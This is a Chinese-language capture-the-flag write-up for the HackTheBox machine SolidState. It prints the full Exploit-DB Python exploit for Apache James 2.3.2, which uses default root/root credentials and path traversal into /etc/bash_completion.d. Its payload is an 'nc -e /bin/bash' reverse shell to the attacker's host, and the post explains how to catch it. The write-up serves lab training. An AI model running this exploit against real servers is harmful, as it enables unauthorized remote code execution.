• HTB-靶机-SolidState

    本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关

    靶机是作者购买VIP使用退役靶机操作,显示IP地址为10.10.10.51

    本次使用https://github.com/Tib3rius/AutoRecon 进行自动化全方位扫描

    执行命令

    autorecon 10.10.10.51 -o ./solidstate-autorecon

    发现开放了4555端口,对应的服务是jame-admin 存在远程代码执行漏洞

    对应exploit代码:https://www.exploit-db.com/exploits/35513

    #!/usr/bin/python
#
# Exploit Title: Apache James Server 2.3.2 Authenticated User Remote Command Execution
# Date: 16102014
# Exploit Author: Jakub Palaczynski, Marcin Woloszyn, Maciej Grabiec
# Vendor Homepage: http://james.apache.org/server/
# Software Link: http://ftp.ps.pl/pub/apache/james/server/apache-james-2.3.2.zip
# Version: Apache James Server 2.3.2
# Tested on: Ubuntu, Debian
# Info: This exploit works on default installation of Apache James Server 2.3.2
# Info: Example paths that will automatically execute payload on some action: /etc/bash_completion.d , /etc/pm/config.d

import socket
import sys
import time

# specify payload
#payload = 'touch /tmp/proof.txt' # to exploit on any user
#payload = '[ "$(id -u)" == "0" ] && touch /root/proof.txt' # to exploit only on root
payload = 'nc -e /bin/bash 10.10.14.5 8833' # to exploit only on root
# credentials to James Remote Administration Tool (Default - root/root)
user = 'root'
pwd = 'root'

if len(sys.argv) != 2:
    sys.stderr.write("[-]Usage: python %s <ip>
" % sys.argv[0])
    sys.stderr.write("[-]Exemple: python %s 127.0.0.1
" % sys.argv[0])
    sys.exit(1)

ip = sys.argv[1]

def recv(s):
        s.recv(1024)
        time.sleep(0.2)

try:
    print "[+]Connecting to James Remote Administration Tool..."
    s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.connect((ip,4555))
    s.recv(1024)
    s.send(user + "
")
    s.recv(1024)
    s.send(pwd + "
")
    s.recv(1024)
    print "[+]Creating user..."
    s.send("adduser ../../../../../../../../etc/bash_completion.d exploit
")
    s.recv(1024)
    s.send("quit
")
    s.close()

    print "[+]Connecting to James SMTP server..."
    s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.connect((ip,25))
    s.send("ehlo team@team.pl
")
    recv(s)
    print "[+]Sending payload..."
    s.send("mail from: <'@team.pl>
")
    recv(s)
    # also try s.send("rcpt to: <../../../../../../../../etc/bash_completion.d@hostname>
") if the recipient cannot be found
    s.send("rcpt to: <../../../../../../../../etc/bash_completion.d>
")
    recv(s)
    s.send("data
")
    recv(s)
    s.send("From: team@team.pl
")
    s.send("
")
    s.send("'
")
    s.send(payload + "
")
    s.send("
.
")
    recv(s)
    s.send("quit
")
    recv(s)
    s.close()
    print "[+]Done! Payload will be executed once somebody logs in."
except:
    print "Connection failed."

    利用方式:

    对应的exploit需要更改的就是payload更改为: 'nc -e /bin/bash 10.10.14.5 8833'  然后本地kali监听端口8833

    执行:python 35513.py 10.10.10.51

    等待nc成功接收的反弹shell即可

    此靶机跟我之前做的vulnhub是一模一样,对应的手动操作链接:https://www.cnblogs.com/autopwn/p/13809602.html 

    迷茫的人生,需要不断努力,才能看清远方模糊的志向!
  • 相关阅读:
    ComboBox.DoubleClick事件
    mktime 夏令时
    STL String的使用[转]
    加在电源后至进入操作系统前的计算机的行为
    C语言数据类型大小分析(基于VC2005编译器)
    linux线程同步之条件变量
    windows 下架设svn服务器(转载+修改) (非利用Google项目托管)
    浅尝《Windows核心编程》之内核对象
    C——数组与指针
    如何用U盘做系统启动盘WINPE 并且 利用WINPE安装Ghost
  • 原文地址:https://www.cnblogs.com/autopwn/p/14023953.html
Copyright © 2020-2023  润新知